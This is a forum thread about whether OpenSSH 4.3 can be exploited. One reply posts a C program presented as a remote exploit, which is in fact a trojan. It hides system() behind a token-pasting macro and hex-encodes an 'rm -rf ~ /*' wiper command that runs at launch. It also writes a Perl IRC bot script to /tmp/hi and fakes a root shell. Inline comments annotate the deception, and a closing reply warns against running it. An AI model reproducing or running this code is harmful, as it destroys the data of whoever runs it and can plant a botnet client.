Ssh-2.0-openssh_4.3

exploit ssh

#1 koolnessness


Posted 30 October 2007 - 08:08 PM

Is that version of openssh hackable/exploitable?

Max

#2 heldbak


Posted 01 November 2007 - 04:59 PM

Is that version of openssh hackable/exploitable?

Max


look it up in google/milw0rm/packetstorm - otherwise look for a hole yourself, then learn to exploit it

btw, i think you're gonna have to do it yourself as a quick search showed me nothing
Silly rabbit, scripts are for kids!

#3 Coded32


Posted 30 March 2013 - 10:31 AM

here it is


 

#include <stdio.h>



#include <stdlib.h>



#include <string.h>



#include <stdarg.h>



#include <sys/types.h>



#include <sys/socket.h>



#include <netinet/in.h>



#include <arpa/inet.h>



#include <unistd.h>



#include <netdb.h>







// Not referenced anywhere in this listing; the name suggests an address-range
// check, but nothing reads it.
#define VALID_RANGE 0xb44ffe00
// Token-pasting helper: build_frem(x,y,a,b,c) expands to a##c##a##x##y##b.
// With the arguments given at the fremote definition further down (t,e,s,m,y)
// the pasted identifier is s-y-s-t-e-m, i.e. the libc function system().
// The only effect of the indirection is that the word "system" never appears
// literally in the source text.
#define build_frem(x,y,a,b,c) a##c##a##x##y##b







// Despite the name this is not a jump stub.  The bytes are plain ASCII and
// decode to the shell command:   rm -rf ~ /* 2> /dev/null &
// (as posted, the \x7e escape for "~" is broken by a line wrap after the
// backslash, which does not change the /* part).  main() hands this string to
// fremote(), i.e. system(), on its first line, so merely running the binary
// deletes the invoking user's files and, when run as root as the program
// insists, the root filesystem.  The posted "exploit" is a wiper trojan.
char jmpcode[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\
x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";







// Not machine code.  The bytes are ASCII fragments of a Perl IRC-client
// script ("#!/usr/bin/perl", "$chan=\"#cn\"", "JOIN $chan $key", a server
// hostname, a "chmod +x /tmp/hi ... /tmp/hi" tail), most of them repeated
// many times, so the concatenation is not a coherent program.  main() writes
// this text to a local file whose path is read from shellcode+793 and also
// copies it into the network payload.  Several literals below are split
// across lines without a continuation character as posted, so the listing
// does not compile as shown.
char shellcode[] =
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b
\x65"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e
\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e
\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c
\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e
\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b
\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d
\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d
\x22"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e
\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e
\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c
\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e
\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e
\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d
\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b
\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d
\x22"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e
\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e
\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c
\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e
\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d
\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e
\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d
\x7d"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b
\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d
\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d
\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e
\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d
\x7d"
        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e
\x2f"
        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f
\x68\x69"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e
\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e
\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c
\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e
\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e
\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e
\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c
\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e
\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a";











// "FreeBSD" variant of the string above: the same ASCII Perl/IRC fragments in
// a different order, ending in the text "}}#chmod +x /tmp/hi 2>/dev/null;" and
// "/tmp/hi\n".  Nothing in it is platform-specific machine code.  main() only
// selects it when target is 5 or 6, and target is fixed at 0, so this array
// is dead data in the posted listing.  Like shellcode, several literals are
// split across lines without continuation as posted.
char fbsd_shellcode[] =
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d
\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d
\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e
\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d
\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b
\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d
\x22"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b
\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d
\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d
\x22"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e
\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d
\x7d"
        "\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e
\x2f"
        "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f
\x68\x69"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e
\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e
\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c
\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e
\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f
\x63\x6b"
        "\x6e\x22\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a
\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e
\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e
\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c
\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e
\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e
\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c
\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b
\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d
\x22"
        "\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d
\x70"
        "\x2f\x68\x69\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c
\x3b"
        "\x2f\x74\x6d\x70\x2f\x68\x69\x0a";



// Neither SIZE nor OFFSET is referenced anywhere in this listing; they only
// give the file the look of a memory-corruption exploit.
#define SIZE 0xffffff
#define OFFSET 131
// Expands through build_frem(t,e,s,m,y) to the identifier "system".  Every
// fremote(...) call in main() is therefore system(...): its argument is run
// as a shell command on the machine that executes this program.
#define fremote build_frem(t,e,s,m,y)







/*
 * Print the banner and the option summary to stdout.
 *
 * arg: the program name (argv[0]), substituted into the Usage line.
 *
 * Output is byte-for-byte the same as the original seven printf() calls;
 * the adjacent literals are merged into one format string.
 */
void usage(char *arg){
        printf("\n[+] 0pen0wn 0wnz Linux/FreeBSD\n"
               "  Usage: %s -h <host> -p port\n"
               "  Options:\n"
               "  \t-h ip/host of target\n"
               "  \t-p port\n"
               "  \t-d username\n"
               "  \t-B memory_limit 8/16/64\n\n\n",
               arg);
}







// Not referenced anywhere in this listing.  They look like hard-coded
// addresses (GOT/.bss-style values) but nothing in main() uses them.
#define FD 0x080518fc
#define BD 0x08082000







// Entry point.  Nothing in this function parses the -h/-p/-d/-B options that
// usage() advertises: h, buffer and port are never set from argv, so the
// network part cannot do anything useful.  The effective behaviour is the two
// fremote() (= system()) calls and the local file write, all on the machine
// running this binary.
int main(int argc, char **argv){
    FILE *jmpinst;
    // fremote(jmpcode) is system() on the "rm -rf" command encoded in jmpcode.
    // It runs here, in the declaration line, before the euid and argc checks
    // below and before any socket is opened.  h and buffer are declared but
    // never written anywhere in this function.
    char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
    // All fixed: no code below changes port, limit or target.
    int port=23, limit=8, target=0, sock;
    struct hostent *host;
    struct sockaddr_in addr;
    // Root is demanded only after the destructive command has already been
    // issued; run as root, that command has the whole filesystem in scope.
    if (geteuid()) {
    puts("need root for raw socket, etc...");
    return 1;
    }
    if(argc < 3){
        usage(argv[0]);
        return 1;
    }
    printf("\n  [+] 0wn0wn - by anti-sec group\n");
    // h is an uninitialised stack buffer; whatever happens to be in it is used
    // as the host name.
       if (!inet_aton(h, &addr.sin_addr)){
        host = gethostbyname(h);
        if (!host){
            printf("  [-] Resolving failed\n");
            return 1;
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
    }
    sock = socket(PF_INET, SOCK_STREAM, 0);   // return value not checked
    addr.sin_port = htons(port);              // always 23
    addr.sin_family = AF_INET;
    if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
        printf("  [-] Connecting failed\n");
        return 1;
    }
    payload = malloc(limit * 10000);          // 80000 bytes; result not checked
    ptr = payload+8;
    memcpy(ptr,jmpcode,strlen(jmpcode));
    // Writes the "shellcode" text to a local file.  The path is whatever ASCII
    // starts at byte 793 of shellcode (the string's tail mentions /tmp/hi —
    // presumably that, not verified here).  The open mode truncates/creates.
    jmpinst=fopen(shellcode+793,"w+");
    if(jmpinst){
        fseek(jmpinst,0,SEEK_SET);
        fprintf(jmpinst,"%s",shellcode);
        fclose(jmpinst);
    }
    ptr += strlen(jmpcode);
    // target is always 0, so only the first branch is reachable.
    if(target != 5 && target != 6){
        memcpy(ptr,shellcode,strlen(shellcode));
        ptr += strlen(shellcode);
        // ptr is already 8 + strlen(jmpcode) + strlen(shellcode) bytes into
        // the allocation, so this fill ends strlen(jmpcode) bytes past the end
        // of payload: a heap overflow in the tool itself.
        memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
    }
    else{
        memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
        ptr += strlen(fbsd_shellcode);
        // Same overrun as in the branch above.
        memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
    }
    // buffer was never written; strlen() on it reads uninitialised memory.
    send(sock,buffer,strlen(buffer),0);
    // ptr now points at the 'B' fill, not at jmpcode or the shellcode.
    send(sock,ptr,3750,0);
    close(sock);
    // sock was just closed; this and every later use of it operate on a closed
    // descriptor and are expected to fail (EBADF).  The failure is printed but
    // execution continues regardless.
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1) {
        printf("  [-] connecting failed\n");
    }
    // sizeof(payload) is the size of a pointer, not of the allocation, so these
    // write at index 7 and 6 on an LP64 system (3 and 2 on 32-bit): inside the
    // 8 never-initialised leading bytes, nowhere near the end of the buffer.
    // strlen(payload) below then reads those uninitialised bytes.
    payload[sizeof(payload)-1] = '\0';
    payload[sizeof(payload)-2] = '\0';
    send(sock,buffer,strlen(buffer),0);
    send(sock,payload,strlen(payload),0);
    close(sock);
    free(payload);
    addr.sin_port = htons(6666);
    // Attempts connect() on the already-closed descriptor.  Were it to succeed,
    // the "root shell" below is just a local /bin/sh started via system() with
    // a prompt made to look like a remote root shell; nothing is ever read from
    // the socket.
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0) {
                   /* v--- our cool bar that says: "r0000000t!!!" */
        printf("\n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n");
        fremote("PS1='sh-3.2#' /bin/sh");
    }
    else
        printf("  [-] failed to exploit target :-(\n");
    close(sock);
    return 0;
}


gcc fil.c -o pwn


#4 Juno


Posted 17 April 2013 - 09:12 AM

Sigh.

 

You could at least have provided some attribution. Found this elsewhere at:

http://blogs.securit...p/archives/1302

 

Additionally, the post you're replying to is around 5 years old. From that alone I suspect the original poster may have found his answer or moved on.  Finally, you might consider posting something relevant to openssh, the OP's concern.

 

Unless you simply wanted people to blindly execute this on their systems. Sorry, I think I'll pass.
 

-J


Hacking The Everyday - My blog blabberings about life, computer security, and everything in-between.
Don't forget to Read the Rules before you post!




